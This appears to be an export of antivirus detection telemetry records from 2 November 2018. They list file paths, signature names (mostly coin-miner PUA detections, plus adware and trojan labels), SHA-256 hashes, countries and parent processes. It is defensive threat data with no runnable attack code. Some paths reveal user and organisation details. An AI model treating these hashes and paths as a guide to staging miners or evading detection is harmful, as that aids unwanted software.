  Row(detection=Row(filename='avscan-20181102-225637-5fbe12f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_64aab52c\\AVSCAN-20181102-225519-54E9F9E7\\AVSCAN-20181102-225637-5FBE12F9', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:57:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110528-dfa99c9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110528-DFA99C9F', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110540-e2231c6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110540-E2231C6B', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\nhm_windows_1.9.0.4\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:bqvPMQAoWUaX83yA.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:55:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Zecminer\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:0qp\\\\\\/Q\\\\\\/Iis0Oes0FD.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:47:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\NICE\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:2kPxSQckmkSZhgpS.1', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:51:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110552-e4c77291', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110552-E4C77291', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105514-5efb308d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105514-5EFB308D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105518-5fe58125', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105518-5FE58125', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105522-60cd444d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105522-60CD444D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:58:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-185640-9f428b14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a942d32\\AVSCAN-20181102-185627-9C8F9B48\\AVSCAN-20181102-185640-9F428B14', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:56:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\nhm_windows_1.9.0.7\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-Embedding', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\RuntimeBroker.exe', parentsize=None, timestamp='2018-11-02T23:14:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.vir', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\PortableApps.com\\MsiExEc64.VIR', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:14:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Program Files (x86)\\BetterHash\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-SILENT -RESUMELASTSTATE', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BetterHash\\BetterHash.exe', parentsize=13204056, timestamp='2018-11-02T09:27:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110241-bca41071', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110241-BCA41071', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Program Files (x86)\\360\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:cUsVGYelgkW+dOtC.2', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T17:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123857-6274ad99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_67523b18\\AVSCAN-20181102-123847-5FEDE2B5\\AVSCAN-20181102-123857-6274AD99', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:38:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Google Drive\\minerzec\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='LT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T09:38:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Program Files (x86)\\360\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:cUsVGYelgkW+dOtC.2', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T17:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Program Files (x86)\\360\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:cUsVGYelgkW+dOtC.2', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T17:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\AppData\\Local\\WinMiner\\Miners\\EWBF64_0.3.4\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/minimized', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Locktime Software\\NetLimiter 4\\NLClientApp.exe', parentsize=55632, timestamp='2018-11-02T19:06:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110253-bf56a15d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-110253-BF56A15D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Zec Miner 0.3.4b\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='x -iext -ow -ver -- \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Desktop\\\\\\\\Zec Miner 0.3.4b.zip\\\\\\" \\\\\\"C:\\\\\\\\Users\\\\\\\\User\\\\\\\\Desktop\\\\\\\\Zec Miner 0.3.4b\\\\\\\\\\\\\\"', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1163264, timestamp='2018-11-02T03:27:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\Setup\\Equihash\\NVIDIA\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/4', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\Taskmgr.exe', parentsize=1252576, timestamp='2018-11-02T16:43:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\CamStudio 2.7\\msiexec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='--engine=2 --session-id=uGYsmGd9pMbzVPOkTCpf8NWJfFn53qve\\\\\\/e6ydHiI --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-02T16:44:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:09:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Program Files (x86)\\BetterHash\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BetterHash\\BetterHash.exe', parentsize=13204056, timestamp='2018-11-02T14:42:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\NTServices\\mSiexec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T22:38:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:57:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\monero\\Zcash Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T21:40:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:44:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\monero\\Zcash Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:41:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='181934393.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\181934393.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/DB', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-02T17:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.gh', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\GamerHash\\miners\\ewbf_v1\\miner.gh', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:50:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='F:\\BTG-nVidia.miner.0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-02T18:18:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='G:\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T12:29:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\nhm_windows_1.9.0.4\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-02T15:09:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105808-83730b51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105808-83730B51', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064816-359e50c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06b5908c\\AVSCAN-20181102-064758-31C06270\\AVSCAN-20181102-064816-359E50C3', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:48:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='connection_error.html', filepath='C:\\Program Files (x86)\\Avira\\Launcher\\pages\\it-IT\\connection_error.html', filesize=220000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='851268081d7e641b30e6489200194cd46c638953dc06c6ae3dc037e9ee7e134c', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T12:54:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100811-b76e4a1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9281dc5a\\AVSCAN-20181102-100637-AA2865DA\\AVSCAN-20181102-100811-B76E4A1D', filesize=1844000, name='PUA/InstallCore.#M1.#R1'), hash='8527ceb21de1d07165c27a128c66e4bb4827a95ca6f29aa43683210ac12754c0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:08:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='baixaki_opera_vijucf.exe', filepath='C:\\Users\\X\\Downloads\\Programs\\Baixaki_opera_VIjUcf.exe', filesize=1844000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='8527ceb21de1d07165c27a128c66e4bb4827a95ca6f29aa43683210ac12754c0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskhost.exe', parentsize=None, timestamp='2018-11-02T12:55:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='firefox.exe', filepath='E:\\Treulieb GmbH und Bildungszentrum\\Vertraulich\\2 altes\\Behindertenförderung\\Firefox.exe', filesize=108000, name='PUA/Outbrowse.Gen.#M300.#R5615'), hash='876ce9a4d711a29f0469c1f9e20d566d8534dff2159291a720e1912ad6b684db', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T08:01:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090844-0274a24c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d6202e76\\AVSCAN-20181102-090809-FDBBFAEF\\AVSCAN-20181102-090844-0274A24C', filesize=108000, name='PUA/Outbrowse.Gen.#M300.#R5615'), hash='876ce9a4d711a29f0469c1f9e20d566d8534dff2159291a720e1912ad6b684db', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='880c8d9b62074a973ace4e3d95fe2d402a63943afe4366bf95cd0b11f5ef75f1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\880C8D9B62074A973ACE4E3D95FE2D402A63943AFE4366BF95CD0B11F5EF75F1', filesize=2048000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='880c8d9b62074a973ace4e3d95fe2d402a63943afe4366bf95cd0b11f5ef75f1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:20:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ntbootautofix.exe', filepath='E:\\HBCD\\Programs\\NTBOOTAutoFix.exe', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083050-b29e39bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083050-B29E39BB', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ntbootautofix.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\NTBOOTAutoFix.exe", filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101843-9422b926', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101843-9422B926', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:30Z'), dt=datetime.date(2018, 11, 2)),
